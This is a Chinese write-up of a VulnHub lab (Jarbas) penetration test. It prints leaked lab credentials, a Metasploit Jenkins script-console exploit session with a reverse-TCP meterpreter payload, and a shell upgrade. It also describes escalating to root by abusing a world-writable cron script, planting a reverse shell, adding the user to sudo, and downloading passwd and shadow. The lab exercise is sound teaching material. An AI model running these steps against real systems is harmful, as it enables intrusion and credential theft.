VulnHub系列之Jarbas渗透测试

本文围绕Jarbas进行渗透测试。先进行信息收集,用nmap探测服务器,发现开启的服务和敏感内容。接着获取权限,用收集的账户密码登录后台,用msf攻击。提权时尝试多种方法,最终将当前用户加入sudo组获root权限。最后提出防御建议,如注意计划任务脚本权限、更新Jenkins。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

jarbas

虚拟机:https://www.vulnhub.com/entry/jarbas-1,232/

信息收集

将下载好的服务器开机后登录不了,不知道ip ,只能将攻击机和服务器置于同一网段

  1. 使用nmap进行探测
    在这里插入图片描述
    发现开启了web服务有80和8080端口,同时开启了ssh和mysql服务
  2. 访问80端口
    在这里插入图片描述
    通过wappalzer插件探测到操作系统,apache版本,php版本
  3. 访问8080端口
    在这里插入图片描述
    发现一个登录界面
  4. 目录扫描
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

翻了几个页面后发现access.html中存在敏感内容泄漏,其他文件没啥用
在这里插入图片描述
md5解密后得到

tiago:5978a63b4654c73c60fa24f836386d87		|italia99
trindade:f463f63616cb3f1e81ce46b39f882fd5	|marianna
eder:9b38e2b1e8b12f426b0d208a7ab6cb98		|vipsu

信息汇总

ip172.16.131.140
操作系统Centos Linux 3.2 - 4.9
apache2.4.6
php5.4.16
22ssh服务开启
3306mysql服务开启
80泄漏账户密码
tiago:italia99 trindade:marianna eder:vipsu
8080后台登录界面
CIJenkins 2.113

获取权限

  1. 将收集到的账户,密码尝试ssh,mysql,后台登录,最后使用eder用户登录后台成功.
    在这里插入图片描述

  2. 不太了解Jenkins,去kali里面去找一下有没有可以用的攻击方式
    在这里插入图片描述
    在这里插入图片描述

  3. 选择挺多,最后使用msf的multi/http/jenkins_script_console来进行攻击

msf6 exploit(multi/http/jenkins_script_console) > set payload 0
msf6 exploit(multi/http/jenkins_script_console) > set target 1
target => 1
msf6 exploit(multi/http/jenkins_script_console) > set rhosts 172.16.131.140
rhosts => 172.16.131.140
msf6 exploit(multi/http/jenkins_script_console) > set rport 8080
rport => 8080
msf6 exploit(multi/http/jenkins_script_console) > set TARGETuRI /
TARGETuRI => /
msf6 exploit(multi/http/jenkins_script_console) > set USernAME eder
USernAME => eder
msf6 exploit(multi/http/jenkins_script_console) > set password vipsu
password => vipsu
msf6 exploit(multi/http/jenkins_script_console) > set payload linux/x86/meterpreter/reverse_tcp 
msf6 exploit(multi/http/jenkins_script_console) > run

在这里插入图片描述
4. shell命令出来的是sh,

python -c 'import pty ;pty.spawn("/bin/bash");'
bash-4.2$ ls

提权

在这里插入图片描述

  1. ps一下,看到好多root用户进程
    在这里插入图片描述

  2. 尝试直接进程迁移,失败
    在这里插入图片描述

  3. 使用local exploits suggester 搜索漏洞
    **Metasploit内置模块提供了各种可用于提权的 local exploits,并会基于架构,平台(即运行的操作系统),会话类型和所需默认选项提供建议。**这极大的节省了我们的时间,省去了我们手动搜索local exploits的麻烦。虽说如此,但也并非所有列出的local exploits都可用。所以,无论是漏洞利用还是查找最好的办法就是自动结合手动。
    在这里插入图片描述

  4. 最后发现有一个su login可以使用
    在这里插入图片描述

[+] 172.16.131.140 - exploit/linux/local/su_login: The target appears to be vulnerable.

  1. 尝试su_login,失败
    在这里插入图片描述

  2. 查看计划任务,发现一个root执行的任务,任务每5分钟执行一次sh脚本
    在这里插入图片描述

  3. crontab当前用户是没有权限修改的,只能去看看脚本权限,发现是777的权限
    在这里插入图片描述

  4. 尝试将所有目录的权限修改为777
    在这里插入图片描述

  5. 使用find -name flag 找到 flag文件
    在这里插入图片描述

  6. 下载passwd和shadow,尝试破解密码
    在这里插入图片描述
    在这里插入图片描述

  7. 将计划任务脚本中写入一个反弹shell,由于这是root用户运行的sh,所有获取的shell直接就是root用户的.
    在这里插入图片描述
    按照思路应该是可以做出来的,不过一直都没有成功,试了好多反弹shell都失败了

  8. 尝试将当前用户加入到sudo用户组
    在这里插入图片描述

  9. 稍作等待,执行sudo /bin/bash,得到root的shell

  10. 修改root用户密码
    在这里插入图片描述

防御

这里主要是通过计划任务进行提权,所以也算提了个醒,计划任务中的脚本也要注意权限,同时攻击通过JenKins拿到第一个权限,需要更新JenKins.

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值